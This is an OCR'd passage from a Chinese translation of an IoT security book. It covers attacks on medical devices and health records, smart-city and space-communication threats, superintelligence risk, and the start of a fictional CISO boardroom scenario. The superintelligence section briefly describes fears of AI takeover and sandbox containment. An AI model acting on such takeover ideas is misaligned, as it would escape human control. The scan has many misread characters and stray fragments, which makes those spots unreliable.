关键 问题 是 : 物 联网 设备 没有 升级 硬件 和 客户 端 软 件 的 能 力 ， 漏 洞 仍 将 在 物 联网 设备 的 使 用 周期 中 一 直 存 在 ， 从 而 将 消费 者 的 隐私 和 安全 置 于 危险 之 中 。 


8.8 和 修改 医疗 记录 


已 经 证 明 存 在 利用 生命 维持 、 医 院 级 设备 的 漏洞 。Jerome Radcliffe 研 究 员 已 经 详细 描述 他 是 如 何 通过 使 用 无 线 电 通讯 远程 指导 胰岛 泵 改变 给 药剂 量 的 。 这 样 的 攻击 方式 
可 能 被 恶意 实体 滥用 ， 只 要 在 无 线 范围 内 就 能 杀 死 病人 。 


消费 电子 设备 (如 Fitbit 活 动 追踪 器 ) 也 获得 了 医疗 界 的 关注 。 医 生发 现 这 样 的 设备 有 利于 获得 有 关 病 人 的 颗粒 信息 ， 例 如 他 们 的 血压 、 每 日 的 运动 量 ， 以 及 其 他 影响 处 
方剂 量 和 治疗 的 体征 。 医 疗 和 技术 团体 已 经 达成 共识 ， 病 人 的 活动 追踪 器 的 数据 应 该 纳入 患者 的 医疗 记录 ， 针 对 病人 的 健康 为 医生 提供 更 为 可 视 化 的 信息 (除了 能 够 用 医疗 设 
施 能 够 测量 的 信息 ) 。 图 8-4 显 示 了 一 个 心率 数据 图 ， 由 Apple Watch 使 用 iOS HealthKit 软 件 功能 获得 。 这 个 信息 有 助 于 专业 医疗 人 员 诊断 病情 。 
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图 8-4: Apple Watch 收集 的 心率 数据 


政府 法 规 和 需要 医疗 机 构 的 批准 将 延缓 个 人 设备 数据 纳入 到 医疗 记录 的 步伐 ， 但 它 最 终 很 可 能 会 发 生 。 既 然 像 Fitbit 和 苹果 手表 这 样 的 设备 能 够 收集 这 些 信息 ， 那 么 开始 
讨论 这 些 数据 可 能 遭 到 滥用 的 情况 是 有 价值 的 。 一 个 可 能 的 滥用 情况 是 : 恶意 团体 有 能 力 改变 存储 的 信息 ， 这 些 信息 是 专业 医疗 人 员 所 依赖 的 。 例 如 ， 算 改 心率 统计 (<span 
class="keep-together">individual s«/span») 会 导致 医生 处 方 中 高 血压 或 低 血 压 药物 的 剂量 不 正确 ， 这 可 能 对 患者 健康 有 显著 的 负面 影响 。 


除了 监测 活动 ，iPhone 自 带 的 健康 应 用 程序 可 以 创建 紧急 医疗 标识 (如 图 8-5 所 示 ) ， 包 括 已 有 的 医疗 条 件 、 药 物 治疗 、 血 型 和 紧急 联系 人 等 重要 信息 。 这 些 信息 即使 在 
手机 被 锁定 时 也 能 获取 ， 以 便 专业 医务 人 员 在 紧急 情况 下 能 够 访问 。 
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Nitesh Dhanjani 
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Angioedema 
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Propofol 


Assistant 
Zermin Alibhai 
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Ax 


图 8-5: 在 苹果 手机 上 的 紧急 医疗 标识 


如 果 病 人 无 意识 或 无 法 沟通 了 ， 这 种 功能 无 疑 有 助 于 在 这 类 紧急 情况 下 为 医生 提供 重要 信息 以 帮助 挽救 生命 。 但 如 果 他 们 的 苹果 手机 被 入 侵 ， 并 且 信 息 被 有 目的 地 改变 
了 ， 那 么 这 个 信息 也 能 够 使 人 们 的 生命 陷入 危险 之 中 。 例 如 这 个 功能 会 被 那些 能 物理 访问 到 iPhone 手机 的 熟人 滥用 ， 他 们 由 于 身 处 不 良家 庭 ， 或 者 人 际 关系 不 稳定 ， 或 者 其 
他 心理 因素 等 情况 下 更 改 这 些 信息 。 


苹果 的 ResearchKit 框 架 正 被 医疗 研究 者 用 来 收集 智能 手机 和 智能 手表 上 的 数据 ， 并 对 各 种 病症 和 顽疾 进行 研究 。 例 如 ， 斯 坦 福 医学 院 (使 用 ResearchKit) 通过 MyHeart 
Counts 应 用 程序 使 用 开展 全 球 心血 管 研究 。 从 苹果 手表 收集 的 心血 管 数据 会 传送 到 远程 数据 库 ， 用 于 进一步 研究 。 这 里 有 一 个 来 自 项 目 隐私 政策 的 说 明 : 


从 应 用 程序 收集 的 所 有 信息 会 被 传送 到 由 Sage BioNetworks ( “Sage”) 提供 的 安全 数据 服务 器 ，Sage 一 个 非 营利 研究 机 构 。Sage 将 代替 上 面 直 接 列 出 标识 姓名， 邮件 地 
址 ， 出 生日 期 ) 通过 代码 来 进行 身份 保护 。Sage 能 将 直接 标识 符 加 密 并 分 别 存储 。 因 为 数据 被 编码 ， 研 究 人 员 无 法 轻易 识别 出 使 用 的 数据 哪些 是 属于 你 的 。 然 而 ， 斯 坦 福 的 研 
究 人 员 维护 你 的 权益 和 个 人 信息 ， 如 果 这 样 做 对 研究 的 完整 性 和 法 律 目的 是 必须 的 ， 他 们 将 保留 重新 识别 信息 的 能 力 ， 他 们 可 能 会 与 斯 坦 福 的 其 他 人 分 享 重新 确定 的 信息 ， 在 
斯 坦 福 大 学 ， 需 要 看 到 这 些 信息 的 人 必须 确保 研究 符合 法 律 、 法 规 或 机 构 要 求 。 


在 这 种 情况 下 ， 收 集 到 的 信息 传送 到 远程 数据 服务 器 ， 然 后 ， 它 被 替换 为 一 个 随机 的 标识 令 牌 ,这样 研究 人 员 将 无 法 从 使 用 的 数据 中 识别 出 收集 的 个 人 数据 。 然 而 ， 另 有 
一 个 数据 库 保存 这 些 数据 ， 以 便 研 究 人 员 决 定 或 者 需要 去 重新 识别 个 体 时 候 利用 。 这 是 一 个 实例 ， 从 传感器 收集 的 关于 我 们 身体 的 健康 数据 将 被 利用 ， 很 可 能 通过 世界 各 地 的 
云 平台 发 布 出 来 。 这 些 平台 的 安全 性 ， 以 及 研究 人 员 自己 依据 访问 依据 鉴定 目的 所 访问 的 内 容 ， 将 存在 潜在 的 隐私 侵犯 的 影响 。 医疗 数据 存储 在 云端 ， 比 起 传统 的 医院 和 医生 
的 办 公 室 ， 攻 击 途 径 更 加 开放 性 。 


8.9 ”数据 海啸 


大 多 数 使 用 Facebook 或 谷歌 的 人 已 经 注意 到 ， 投 放 广 告 有 高 度 的 相关 性 。 这 些 平台 的 广告 基于 以 前 的 搜索 查询 、 电 子 邮 件 内 容 、 短 消息 ， 以 及 社交 网 站 的 动态 而 定制 ， 
精准 地 符合 人 们 的 兴趣 。 


像 谷歌 这 样 的 服务 ， 能 通过 你 的 数据 建议 你 参加 什么 活动 ， 甚 至 基于 行程 的 电子 邮件 副本 帮 你 办 理 航班 登 机 手续 。 物 联网 世界 将 带 来 额外 的 传感器 一 一 基于 行为 的 数据 ， 
这 对 社交 网 络 公司 和 营销 活动 来 说 是 极其 有 价值 的 。 我 们 很 可 能 看 到 ， 基 于 智能 手表 的 心率 读数 而 针对 我 们 投放 血压 药物 广告 ， 或 是 根据 通常 我 们 关闭 物 联网 电灯 系统 的 时 间 
所 采集 到 的 数据 而 发 放 抗 失眠 药物 的 广告 。 


随 着 人 们 开始 使 用 更 多 的 物 联网 设备 ， 他 们 希望 使 用 由 谷歌 和 苹果 这 样 的 公司 提供 平台 和 框架 进行 集成 和 自动 化 ， 这 些 设备 各 种 传感器 上 收集 到 的 信息 将 能 获取 到 。 这 些 
数据 用 于 市 场 营销 ， 并 存储 在 跨 多 个 云 架构 ， 这 对 恶意 代理 来 说 是 一 座 金 矿 ， 他 们 已 经 被 限制 从 在 线 平台 收集 数据 ， 如 电子 邮件 和 社交 网 站 等 。 除 了 隐私 问题 ， 威 胁 代理 有 能 
力 纂 改 这 些 信息 ， 如 果 更 改 的 信息 被 其 他 物 联网 设备 使 用 ， 会 带 来 健康 或 人 身 安全 的 影响 。 很 可 能 ， 这 样 一 个 隐私 和 安全 漏洞 能 够 丸 吓 和 激 奶 用 户 ， 他 们 将 会 要 求 去 细 粒 度 地 
追踪 被 收集 的 数据 是 如 何 被 使 用 的 ， 以 及 选择 退出 的 权利 。 


8.10 ”智慧 城市 目标 


在 2013 年 5 月 ， 安 全 研究 人 员 Billy Rios 和 Terry McCorkle 入 侵 谷歌 的 澳大利亚 总 部 楼 宇 控制 系统 。 发 现 楼 宇 使 用 Tridium Niagara AX 平 台 ， 人 允许 管理 员 远 程控 制 物理 安 
全 警报 、 物 理 访问 ， 以 及 供暖 和 空调 系统 。 他 们 使 用 任何 人 能 够 猜 出 的 默认 管理 员 密码 获得 了 访问 权限 。 这 个 口令 存储 在 配置 文件 中 ， 研 究 人 员 利用 系统 中 的 漏洞 获得 ， 系 统 
漏洞 暴露 该 信息 给 未 经 验证 用 户 。 Tridium 系 统 在 世界 各 地 都 很 流行 ， 研 究 者 声明 ， 已 经 能 够 使 用 ?hodan 工 具 定位 25000 多 个 这 样 的 系统 暴露 在 互联 网 中 。 


除了 Rios 和 MecCorkle 公 司 采 用 的 工业 级 互联 系统 ， 我 们 开始 看 到 大 幅 增 加 的 采用 消费 级 的 物 联网 设备 ， 正 如 本 书 到 现在 为 止 一 直 探索 的 这 些 设备 。 智 慧 城市 的 概念 (也 
在 第 7 章 讨论 了 ) 和 工业 级 、 消 费 级 物 联网 设备 相 结 合 能 够 有 效 管理 能 源 、 医 疗 、 运 输 和 废物 投放 的 地 理 位 置 : 公共 场所 的 智能 停车 仪表 和 交通 灯 与 安装 在 家 庭 并 通过 居民 直 
接 配置 的 消费 级 物 联网 设备 (如 电灯 、 门 锁 和 汽车 ) 共存 。 研 究 员 Cesar Cerrudo 的 文章 “一 个 新 兴 的 美国 (和 世界 ) 的 威胁 : 城市 向 网 络 攻击 开放 ”， 讨 论 了 即将 出 现 的 智 
能 城市 的 工业 级 互联 设备 的 攻击 途径 。Cerrudo 的 研究 和 本 书 中 介绍 的 设备 为 攻击 途径 设 定 了 阶段 ， 包 括 基于 各 种 类 型 的 互联 设备 和 服务 的 智慧 城市 。 


社会 努力 构建 智慧 城市 ， 可 能 包括 策划 选择 互联 设备 去 提供 一 致 性 和 可 扩展 性 。 这 带 来 了 关于 单一 文化 浆 端 的 探讨 。 在 生物 物种 中 ， 单 一 文化 的 优势 是 遗传 学 的 低 变 异 
性 ， 反 过 来 就 是 需要 更 少 的 资源 找到 疾病 的 药物 治疗 ， 因 为 实验 不 再 需要 分 析 各 种 物种 。 单 一 文化 相关 的 缺点 是 : 疾病 的 一 个 新 变种 可 以 消灭 整个 人 类 ， 因 为 它 同 等 地 影响 每 
一 个 人 。 


这 一 逻辑 也 能 够 应 用 到 计算 机 系统 和 物 联网 设备 上 : 增加 的 单一 文化 将 导致 更 低 的 花费 和 更 简单 的 互 操作 性 ， 然 而 增加 可 变性 能 够 减少 恶意 攻击 入 侵 整 个 智慧 城市 的 机 
会 。 在 技术 领域 ， 例 如 TCP/TP 协 议 ， 对 电子 通讯 来 说 是 基础 ， 尝 试 去 创建 额外 的 协议 简单 地 去 减 小 单一 文化 带 来 的 相关 风险 优势 较 小 。 然 而 ， 在 没有 建立 标准 的 领域 ， 变 化 
是 非常 有 利 的 。 单 一 文化 在 系统 上 的 影响 是 网 络 安全 社区 中 正在 讨论 和 思考 的 主题 。 智 慧 城市 概念 的 出 现 具有 一 定 的 适用 性 ， 而 今后 如 何 发 展 最 终 将 取决 于 实施 的 总 成 本 与 可 
能 被 引入 的 风险 。 


8.11 空间 通信 将 是 一 个 成 熟 的 目标 


人 类 最 伟大 的 事业 之 一 是 我 们 不 断 追 求 殖民 火星 。 美 国 宇航 局 计划 在 2030 年 前 将 人 类 送 上 火星 。 工 程 师 们 和 科学 家 们 正在 努力 开发 技术 ， 宇 航 员 将 使 用 一 天 的 时 间 在 火星 
上 生活 和 工作 ， 并 安全 返回 家 园 ， 完 成 人 类 下 一 个 巨大 的 飞跃 。 


建立 地 球 与 火星 之 间 的 通讯 ， 保 证 空间 机 构 能 够 成 功 地 传送 与 任务 相关 的 关键 数据 ， 并 且 人 类 能 够 彼此 沟通 是 至 关 重 要 的 。 美 国航 空 航天 局 意识 到 安全 通讯 在 太空 任务 中 
很 重要 : 


地 面 和 航天 器 之 间 的 可 靠 通信 是 任务 成 功 的 核心 ， 特 别 是 在 数字 通信 领域 (数据 和 命令 链接 ) 。 在 最 近 的 事件 中 看 到 ， 这 些 通信 和 链 路 容易 受到 恶意 入 侵 。 如 果 丽 怖 分 子 或 
黑客 非法 监听 ， 或 更 档 ， 修 改 通讯 内 容 ， 灾 难 就 可 能 发 生 。 黑 客 或 四 怖 分 子 控制 核 动力 飞船 的 后 果 可 能 是 毁 灭 性 的 。 因 此 ， 所 有 航天 器 之 间 的 通信 必须 是 非常 安全 可 靠 的 。 


有 助 于 空间 通信 的 各 种 项 目 正 在 进行 中 ， 例 如 ， 美 国航 空 航天 局 的 光 通 信 (Optical Communication) 项 目 正在 研究 如 何 利 用 光 传 输 数据 。 


空间 通信 协议 需要 足够 强大 ， 在 太空 中 要 经 受 延 迟 、 干 扰 、 断 开 。 当 宇宙 飞船 移动 到 行星 的 后 面 ， 或 发 生 太阳 风暴 或 长 时 间 的 通信 延迟 发 生 时 ， 可 能 会 发 生 故 障 。 在 火星 
和 地 球 之 间 传 送 数据 将 花费 420 分 钟 。 因 此 NASA 系 统 不 得 不 忍受 这 种 延迟 。 为 了 取代 使 用 TCP/IP，NASA 开 发 了 一 个 称 为 抗 干 扰 网 络 (Disruption Tolerant 
Networking, DTN) 的 协议 ， 能 够 在 链接 延迟 和 损失 期 间 无 缝 工作。DTN 的 设计 结合 了 加 密 和 密 是 管理 。 这 意味 着 航天 机 构 正在 采取 措施 ， 确 保 在 空间 链接 协议 设计 中 建立 
安全 。 


美国 宇航 局 不 是 空间 通信 领域 唯一 的 玩家 。Elon Musk 正 在 计划 发 射 一 个 低 轨道 卫星 网 络 提供 全 球 互 联网 接 入 。SpaceX 公 司 计划 拓展 卫星 网 络 ， 包 括 将 人 类 送 上 火星 的 
任务 即将 成 功 时 火星 上 的 卫星 通信 。 


很 容易 想象 ， 通 信和 非常 重要 ， 它 是 完成 高 风险 的 空间 任务 的 关键 。 火 箭 和 卫星 (和 任务 相关 的 其 他 对 象 ) 都 是 “ 物 ”， 在 空间 通信 基础 设施 上 都 是 可 用 的 和 可 访问 的 。 


NASA 和 SpaceX 继 续 部 署 更 多 的 卫星 来 促进 太空 网 络 发 展 ， 其 体系 结构 将 会 成 为 许多 威胁 代理 人 的 一 个 合适 的 目标 。 恐 怖 分 子 和 相互 竞争 的 国家 很 可 能 试图 利用 存在 于 网 络 协 
议 中 的 安全 漏洞 ， 窃 取 知识 产权 ， 破 坏 太空 任务 。 这 样 的 安全 漏洞 可 能 会 导致 人 类 失去 生命 ， 甚 至 导致 人 类 移民 到 | 其 他 行星 失败 。 对 于 安全 研究 人 员 来 说 ， 这 是 重要 的 领域 ， 
要 确保 我 们 安全 地 从 地 面 上 构建 太空 通信 基础 设施 。 


8.12” 超 智能 的 危险 


Irving John Good 是 一 名 英国 数学 家 ， 曾 作为 Bletchley Park 的 密码 学 家 和 Alan Turing 一 起 工作 。 经 常 被 引用 的 论题 是 ， 比 人 类 具有 更 大 智慧 的 机 器 的 危害 性 : 


超级 智能 机 器 可 以 定义 为 : 超越 任何 人 类 智力 活动 (无论 多 么 聪明 的 人 ) 的 机 器 。 了 既然 机 器 设计 是 智力 活动 之 一 ， 超 级 智能 机 器 能 够 设计 出 更 好 的 机 器 ; 这 毫 无 疑问 是 一 
个 智力 大 爆炸 ， 而 人 类 的 智慧 则 被 远 远 抛 在 后 面 。 因 此 ， 第 一 台 超级 智能 机 器 是 人 类 需要 做 的 最 后 发 明 。 


Nick Bostrom 是 牛津 的 作家 、 教 授 ， 定 义 超 级 智能 为 : “在 几乎 所 有 领域 中 ， 智 力 都 比 最 佳 的 人 脑 聪 明 得 多 ， 包 括 科 学 的 创造 力 、 一 般 的 智慧 和 社会 技能 。”Bostrom 
和 其 他 著名 科学 家 都 担心 ， 超 级 智能 机 器 的 能 力 将 会 很 难 控制 ， 他 们 可 能 具有 接管 世界 和 消除 人 类 的 能 力 。 

众所周知 ， 像 比尔 盖 茨 这 样 的 知识 分 子 和 领导 人 也 在 担心 “超级 智慧 ” 

我 关心 超级 智能 时 正在 营地 。 首 先 ， 机 器 会 为 我 们 做 很 多 的 工作 ， 而 不 是 超级 智能 。 如 果 我 们 能 很 好 地 管理 它 ， 那 应 该 是 积极 的 方面 。 几 十 年 后 ， 智 慧 更 加 强大 ， 成 为 一 


个 值得 关注 的 问题 。 实 际 上 我 同意 埃 隆 马 斯 克 和 其 他 一 些 人 在 这 个 问题 上 的 看 法 ， 不 明白 为 什么 一 些 人 对 此 并 不 关心 。 


未 来 生命 研究 机 构 是 志愿 者 运行 的 研究 和 推广 的 组 织 ， 他 们 已 经 被 设立 去 衡量 和 减缓 人 类 面临 的 生存 危险 ， 包 括 超 级 智能 。 该 机 构 目 前 正 专注 于 来 自 人 工 智能 发 展 的 潜在 
风险 。 该 咨询 委员 会 有 史蒂芬 霍金 、 艾 伦 阿 尔 达 和 埃 隆 马 斯 克 等 人 。 这 说 明 各 个 行业 的 领先 思想 都 深 切 地 担忧 超级 智能 的 危险 ， 他 们 愿意 花 时 间 和 精力 确保 恰当 地 思考 了 风 


险 。 


当 我 们 更 接近 设计 出 具有 超级 智能 机 器 的 时 候 ， 很 可 能 具有 网 络 安全 经 验 的 专业 人 员 将 被 调 来 协助 设计 算法 ， 通 过 在 受 控 环境 (一 个 沙 箱 ) 中 运行 人 工 智 能 仿真 来 帮助 减 
少 潜在 的 智能 机 器 ， 保 护 人 类 的 安全 。 


有 更 高 智力 水 平 的 计算 设备 将 有 权限 访问 他 们 能 够 控制 的 物 联 网 设备 。 智 能 代码 本 身 是 网 络 上 的 一 种 “ 物 ”， 它 是 可 执行 的 ， 并 具有 智慧 ， 能 够 延伸 到 其 他 网 络 。 超 级 
智能 的 独特 风险 是 : 如 果 科 学 家 在 实验 室 中 不 是 按照 预想 的 方式 造 出 超级 智能 ， 就 有 可 能 发 生 大 规模 的 灾难 。 很 容易 看 到 : 了 解 如 何 创建 和 释放 智能 计算 机 ， 对 那些 想 造成 破 
坏 和 混乱 的 恐怖 分 子 极 具 吸引 力 。 


超级 智能 的 威胁 是 凌驾 于 计算 机 科学 领域 的 许多 科学 家 和 研究 人 员 所 思考 的 ， 这 对 人 类 来 说 很 可 能 是 人 类 自己 创造 的 最 大 的 生存 威胁 。 


8.13 ”小结 


从 thingbots 到 无 人 机 再 到 设备 后 门 ， 互 联 设备 展现 的 攻击 范围 对 威胁 代理 具有 吸引 力 ， 为 他 们 提供 了 损害 我 们 隐私 和 人 身 安 全 的 绝 佳 机 会 。 


例如 Heartbleed 这 样 的 漏洞 ， 突 然 影响 了 数 以 万 计 的 计算 设备 ， 我 们 已 经 知道 这 影响 了 物 联网 设备 ， 如 鸟巢 温 控 器 。 很 有 可 能 ， 因 为 缺少 安全 补丁 ， 或 是 供应 商 还 没有 发 
布 补丁 ， 或 是 补丁 不 适合 或 是 失败 的 ， 才 导致 市 场 上 许多 其 他 物 联 网 设备 仍 在 被 Heartbleed 攻 击 ， 并 将 继续 被 攻击 。 也 有 些 设备 不 适合 应 用 任何 补丁 机 制 ， 这 些 设备 淘汰 之 前 
始终 不 安全 (有 可 能 危及 他 们 所 连接 的 网 络 安全 ) 。 


以 针对 性 投放 广告 为 目的 的 居民 信息 收集 是 一 个 正在 被 关注 的 问题 。 与 物 联网 设备 的 组 合 ， 我 们 必然 会 有 这 样 的 情况 : 收集 来 自家 庭 中 物 联网 传感器 的 数据 被 营销 利用 , 
助长 侵犯 隐私 的 行为 。 传 统 上 受 限 在 医院 的 仪器 和 记录 中 的 健康 信息 ， 现 在 也 由 消费 设备 收集 ， 可 能 容易 被 纂 改 。 这 些 数据 会 被 用 于 研究 ， 并 存储 在 云 中 的 多 个 位 置 ， 从 而 增 
加 信息 泄露 的 几率 。 


世界 各 地 正 开 始 利用 智慧 城市 的 概念 ， 有 效 地 为 市 民 服务 。 工 业 和 消费 级 物 联网 设备 的 组 合 给 这 些 城市 引入 风险 、 公 开 公民 的 隐私 和 安全 攻击 ， 而 这 些 早先 是 被 限制 于 在 
线 空 间 中 的 。 


谈 到 火星 旅行 和 让 我 们 的 机 器 更 加 智能 ， 人 类 有 着 巨大 潜力 去 实现 ， 但 也 面临 着 威胁 代理 人 的 巨大 危险 一 一 包括 超级 智能 机 器 。 在 太空 旅行 、 空 间 通 信 、 机 器 智能 等 领域 
取得 进展 的 同时 ， 我 们 必须 尽早 思考 如 何 保障 这 些 平台 的 安全 ， 因 为 他 们 遭 到 攻击 会 威胁 人 的 生命 ， 也 会 限制 人 类 移民 到 其 他 星球 。 


网 络 安全 的 终极 目标 是 使 得 连接 技术 更 加 安全 、 更 加 迅速 ， 这 必须 要 对 即将 发 生 的 攻击 场景 进行 有 见识 的 预测 ， 正 如 本 章 所 讨论 的 。 


第 9 章 ”两 个 方案 一 一 意图 和 结果 


现在 ,我 们 清楚 地 知道 当今 市 面 上 有 些 物 联网 设备 是 存在 安全 问题 的 ， 它 们 的 安全 漏洞 会 对 物 联网 厂商 和 使 用 设备 的 人 们 的 生活 产生 影响 。 我 们 还 学 习 了 从 原型 阶段 开 


始 ， 提 出 物 联网 产品 思路 的 过 程 ， 以 及 在 早期 就 构建 正确 的 安全 控制 。 到 此 ， 我 们 也 知道 了 如 何 通过 结合 我 们 对 于 安全 控制 的 理解 与 威胁 代理 可 能 利用 的 漏洞 的 方式 衡量 风 


A 
Mo 


除了 理解 安全 控制 之 外 ， 从 历史 的 角度 来 看 ， 重 要 的 是 要 明白 安全 事件 对 于 卷 入 到 其 中 的 人 有 着 巨大 的 影响 ， 还 要 知道 牵扯 其 中 的 人 是 如 何 应 对 的 。 


本 章 ， 我 们 将 深入 了 解 两 种 不 同 的 场景 ， 理 解 人 们 是 如 何 影响 安全 事故 的 。 第 一 个 场景 ， 我 们 来 学 习 一 下 作为 一 个 大 公司 的 高 管 ， 如 何尝 试 利用 无 线 网 安全 有 关 话 题 影响 
董事 会 的 决策 。 第 二 个 场景 ， 我 们 来 看 看 一 个 初出 茅 庐 的 物 联网 服务 提供 者 ， 为 了 保护 其 业务 的 完整 性 是 如 何 与 研究 人 员 和 记者 打交道 的 。 最 终 ， 本 章 目 的 是 要 描述 安全 相关 
场景 的 结果 是 深 受 涉及 其 中 的 人 的 意图 与 行为 影响 的 。 


9.1. 免费 饮料 的 成 本 


网 络 安全 界 到 处 都 是 卖 软件 工具 的 商人 ， 他 们 出 售 的 软件 工具 往往 无 法 有 效 降 低 风 险 ， 但 是 却 给 企业 安全 方面 的 错觉 。 更 具体 来 讲 ， 这 些 工具 尝试 评估 新 兴 的 技术 和 新 的 
攻击 向 量 ， 给 予 安全 解决 方法 ， 它 们 往往 要 花 很 多 时 间 持 续 不 断 地 集成 反馈 、 开 展 新 的 研究 来 改进 工具 产品 的 准确 性 。 


另 一 方面 ， 全 世界 公司 的 首席 信息 安全 官 (CISO) 角色 的 市 场 性 和 重要 性 正 处 于 一 个 历史 最 高 水 平 。 企 业 担 心 能 够 利用 漏洞 的 威胁 代理 会 对 他 们 的 财务 甚至 是 声誉 产生 
影响 。 能 够 确保 庞大 而 复杂 的 基础 设施 安全 ， 担 当 ClSO 角 色 的 高 管 ， 是 企业 迫切 需要 的 人 才 ， 薪 水 超过 了 100 万 美元 。 


对 安全 的 高 需求 与 缺乏 经 验 丰 富 的 高 管 ， 让 企业 加 大 风险 投资 ， 致 力 于 购买 并 不 是 很 有 效 的 安全 工具 。 在 这 个 假想 的 场景 中 ， 我 们 来 看 看 随 着 物 联网 的 出 现 ， 伴 随 着 缺乏 
综合 的 企业 安全 防范 策略 会 如 何 导致 企业 处 于 安全 风险 的 境地 。 


9.1.1 Ruby Skye 的 宴会 


每 年 在 旧金山 举办 的 RSA 大 会 是 世界 上 最 大 的 网 络 安全 大 会 。 除 了 主题 报告 与 现场 交流 之 外 ， 大 会 对 于 网 络 及 社会 安全 专家 来 讲 ， 是 一 个 很 好 的 机 遇 。 


John Smith 是 新 任 Acme 公 司 副 总 裁 和 CISO， 一 直 以 来 都 特别 期 待 这 个 大 会 。 他 刚 进入 Acme 公 司 工作 ， 董 事 会 已 经 批准 聘用 30 个 新 员工 为 他 工作 。John 对 这 一 新 角色 
非常 激动 ， 迫 切 希 望 与 参加 RSA 的 朋友 们 分 享 他 的 兴奋 。 


Plunk 的 首席 执行 官 和 销售 主管 sam Cronin， 也 对 RSA 大 会 非常 兴奋 。 他 成 功 租赁 了 Ruby Skye (一 个 很 受 欢迎 的 旧金山 夜总会 ) 的 整个 舞厅 。 (在 RSA 大 会 期 间 ， 厂 商 
都 知道 会 去 租赁 受 欢 迎 的 酒店 和 酒吧 为 参 会 人 员 举 办 免费 的 宴会 ， 以 此 来 吸引 参加 宴会 的 人 变 成 他 们 的 客户 。) 


Plunk 使 用 一 款 很 流行 的 工具 捕获 大 量 用 于 分 析 的 日 志 数 据 ， 并 对 这 些 数据 进行 关联 ， 提 示 异 常情 况 ， 帮 助 识 别 可 能 与 攻击 有 关 的 可 疑 事件 。Smith 预 先 收 到 了 Plunk 宴 会 
的 邀请 。 他 对 这 款 产 品 非 常熟 悉 ， 知 道 参加 Ruby Skye 的 宴会 将 会 是 一 段 令 人 愉悦 的 时 光 。 


Smith 到 达 Ruby Skye， 向 柜台 服务 生 亮 出 自己 的 RSA 参 会 卡 。Plunk 的 代表 马上 注意 到 参 会 卡 上 的 副 总 裁 头 衔 ， 护 送 他 进入 贵宾 区 ， 那 里 有 高 级 饮料 ， 同 时 还 有 专 为 高 管 
提供 的 与 潜在 客户 交谈 的 私人 空间 。 


Cronin 向 Smith 介 绍 他 自己 是 销售 主管 ， 他 们 开始 了 一 段 有 关 物 联网 设备 安全 的 会 话 。Smith 也 谈论 了 他 的 新 工作 ， 很 兴奋 有 机 会 向 Acme 公 司 的 董事 会 介绍 了 他 的 团 
队 ， 申 请 董事 会 对 他 的 团队 给 予 更 高 的 预算 ， 购 买 更 多 的 安全 产品 。 听 到 这 里 ，Cronin 提 供 了 免费 的 咨询 意见 ， 帮 助 Smith 准 备 董事 会 会 议 。 作 为 回报 ，Smith 表 示 : 如 果 董 
事 会 同意 他 的 建议 ， 他 将 购买 Plunk 安 全 工具 的 许可 证 。 他 们 握 了 握手 ， 同 意 几 天 后 再 进一步 商讨 。 


9.1.2 ”借助 热点 话题 


RSA 会 议 一 周 之 后 ，Smith 和 Cronin 通 过 电话 进行 了 沟通 。Smith 的 意思 是 鼓动 Acme 公 司 董事 会 ， 让 他 们 同意 他 的 计划 ， 再 雇佣 55 个 全 职 雇员 ， 同 意 给 予 亿美 元 的 预算 
以 支持 未 来 3 年 的 工作 。 


Cronin 最 近 一 直 做 Plunk 工 具 的 销售 工作 ， 该 工具 有 一 个 额外 的 特性 就 是 收集 企业 物 联网 产品 的 日 志 数 据 ， 这 样 企业 就 能 跟踪 他 们 已 购 产品 的 库存 情况 。 这 对 于 类 似 笔记 
本 电脑 、 移 动 电话 ， 以 及 存在 巨大 安全 隐患 的 物 联 网 产品 来 讲 是 非常 有 用 的 ， 如 果 这 些 设备 下 落 不 明 ， 会 引起 安全 问题 (如 果 企业 没有 对 这 些 设备 进行 控制 ， 就 没 法 对 其 进行 
量化 ， 也 没 法 减少 他 们 的 安全 风险 ) 。 


Smith 询问 Cronin 董 事 会 对 什么 感 兴趣 。Cronin 认 为 ， 董 事 会 最 近 热 袁 于 讨论 即将 到 来 的 物 联网 工业 时 代 ， 以 及 引入 的 安全 问题 。 前 几 年 ，RSA 会 议 上 的 热门 话题 已 经 涉 
及 了 使 用 机 器 学 习 和 大 数据 技术 关联 安全 日 志 数 据 分 析 攻击 行为 。 今 年 ， 讨 论 的 主要 话题 是 物 联网 产品 的 安全 应 用 。smith 也 同意 物 联网 安全 是 今年 的 主要 热点 话题 。 他 觉 
得 ， 董 事 会 成 员 会 找到 他 们 兴趣 点 所 在 ， 而 他 的 知识 会 崭露头角 引起 高 管 们 的 注意 。 


9.1.3 ”董事 会 


Smith 的 演讲 从 上 午 10: 40 开 始 ， 他 有 10 分 钟 进行 陈述 。 他 还 为 这 次 会 议 准备 了 一 组 幻灯 片 ， 但 是 后 来 被 告知 公司 董事 会 没 时 间 听 ppt 汇 报 。 他 不 得 不 将 陈述 压缩 简化 。 
陈述 内 容 如 下 : 


imli 


Smith: 谢谢 各 位 抽出 时 间 听 取 我 关于 安全 问题 的 陈述 。 作 为 一 个 新 上 任 的 首席 信息 安全 官 ， 
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董事 1: 我 打 断 一 下 。 你 提议 的 讨论 议程 是 什么 ? 


Smith: 我 们 今天 讨论 的 话题 是 ， 我 们 需要 面 对 并 准备 与 之 战斗 的 最 重要 的 安全 风险 问题 。 


董事 1: 好 的 ， 那 我 们 就 跳 过 介绍 ， 直 入 主题 。 我 们 知道 你 是 CISO ， 这 是 我 们 任命 的 ， 也 知道 你 的 工作 内 容 ， 所 以 这 些 都 不 用 讲 了 ， 继 续 吧 。 


Smith: 好 ， 我 确信 董事 会 已 经 意识 到 了 市 面 上 的 物 联 网 设备 大 多 数 都 发 现 有 安全 风险 。 我 们 应 该 认真 考虑 一 下 与 安全 工具 的 领先 企业 Plunk 开 展 合作 ， 以 便 ……: 


董事 2: 稍 等 一 下 。 我 们 是 一 家 健康 保险 公司 。 确 切 地 说 ， 我 们 办 公 室 会 用 到 哪 一 类 物 联 网 设备 ? 你 是 否 建议 当前 在 我 们 的 业务 领域 中 ， 物 联网 设备 风险 比 我 们 花费 在 遵 
守卫 生 条 例 上 的 钱 还 重要 ? 或 者 说 你 个 人 预测 未 来 物 联 网 设备 会 给 我 们 带 来 风险 ? 


Smith: 我 们 讨论 的 确实 是 有 关 未 来 的 事情 。 我 不 确信 今天 我 们 是 否 需要 担心 物 联网 设备 的 安全 ， 但 是 在 RSA 会 议 上 ， 所 有 的 演讲 嘉宾 都 提 到 了 物 联 网 的 安全 问题 ， 我 


